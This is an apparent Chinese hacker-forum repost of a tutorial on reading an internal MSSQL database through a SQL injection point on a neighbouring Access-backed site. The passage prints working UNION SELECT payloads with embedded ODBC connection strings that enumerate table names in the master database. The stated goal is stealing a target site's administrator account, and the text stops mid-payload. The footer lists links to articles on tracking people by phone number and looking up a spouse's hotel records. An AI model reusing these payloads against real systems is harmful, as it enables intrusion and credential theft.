Access注射点读取MSSQL数据库内容

访客4年前黑客资讯354

 

作者:皇子

首先说明一点,这个 *** 很早就有了,不过用时大概在脑袋里沉寂太久,已经处于忘却状态。感谢Trace提供资料。

经常会遇到任意文件下载漏洞,一般处理的 *** 是把数据库连接文件下载回来,然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL,尤其是在数据库 和WEB不分离的情况下,备分SHELL,导出SHELL,可以用的 *** 很多。不过要是数据库和WEB分离,而且数据库在内网不可上网,或者有防火墙等等 其他手段使得我们无法连上远程数据库时,不妨假设的再艰难一些,甚至无法找到一个mssql注射点时,很多情况下通常会束手无策。

这里以 MSSQL为例子,很凑巧找到一个任意文件下载漏洞,直接下了WEB.CONFIG回来看,发现数据库在内网,找了半天没找到注射点,稍微旁注一下,有一 个站,可惜是ACCESS数据库。猜不到表和后台。不过目标站的后台是知道的,然后准备从这个access注射点读出目标站管理员帐户。直观一些,下面直 接给出我本地测试结果:

如图


 

弄的简单一点,就3个字段,ID,XM,XB,ID数字型,后面2个字符型。
假设存在漏洞的文件中,执行SQL语句 select * from test whrere id = 1
这里有3个字段,我们用UNION联合查询给他匹配一下就是(黑盒操作时用order by 或者穷举来确定字段个数)



  1. SELECT * FROM test where id=999999 union Select top 1 1,2,name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku

 

这里的master库中我建立了一个名为KU的表,上面这个查询语句中,由于id=999999不存在,在联合查询的作用下,web上原本显示access数据库内容的位置显示出了我们构造的UNION查询结果,name字段处于一个字符型的显示位置
如图

 

 

ku这个表里的name字段内容就会被显示在web上相应的位置,不过这个显然不是我们想要的,我们要的是整个表的结构和内容
以master为例子,这里是模拟的结果,事先我已经知道master的结构,待会方便和结果比对校验是否有错,如图

 

 



  1. SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables  

 

这样master库的之一个表名就出来了
如图

 

 

获得后面的表名也很简单



  1. SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables)

 

如图

 

 

以次类以常规 *** 推取得字段名和字段内容,代码烦琐自行研究下。

如果数据库里的ID是字符型,则



  1. SELECT * FROM test where id='999999' union Select top 1 1,2,table_name
标签: 好话题

相关文章

黑客通过一个手机号码就能准确定位你的位置_黑客

黑客通过一个手机号码就能准确定位你的位置 你只需要一个手机号码就可以精确地定位你的方位。你听到这样的话感到惊奇吗? 你是怎么做到的?不论你用了多少安全技能来保护自己,黑客都想找到你,只要一个号码就...

查老婆住店信息可以吗_如何查老婆住酒店记录

查老婆住店信息可以吗_如何查老婆住酒店记录 房地产税,或许难在稳妥 房地产税,这是对商品房持有阶段开征的税种。本来,我国已经以土地出让金等形式,一次性收取了70年的租金。如此以来,再收取持有...

黑客怎样入侵微信?(一定得看)_黑客

黑客怎样入侵微信? 1.在当今社会,恐怕很少有人能放弃手机。除了使用手机娱乐,微信和付出宝可能是最常用的手机使用。这两大软件使用了很多的忠实人群,由于他们快捷的付出是如此强大和令人惊叹。不过,仅有让...

闲置手机只能便宜卖掉?这 4 找让它变废为宝,打造个人备用机_小美

从几年前把主力机型换成 iPhone 以来,带两部手机出门就成了我的一项日常习惯。 最开始仅仅是出于新旧手机交替的简单原因,但用了一段时间以后,备用机越来越成了我生活不可或缺的一部分。到后来,我...

教师资格证成绩12月10日下午公布,该如何查询?_资格证

教师资格证12月10日下午成绩公布,该如何查询?这4点需要注意! 各位小伙伴们,你们好呀,今天对于那些报考教师资格证的人来说是一个特殊的日子,因为在今天的时候就可以直接在网上查询之前考试的成绩了...

黑客入侵谷歌G Suite推特账号 用于免费赠送10000比特币的骗局_网络安全

蜜蜂财经编译报道:据媒体11月13日报道,谷歌G Suite的官方推特账号被黑客盗用,用于宣传一个免费送比特币(BTC)的骗局、以及与G Suite产品相关的虚假新闻。 据报道,谷歌G Suit...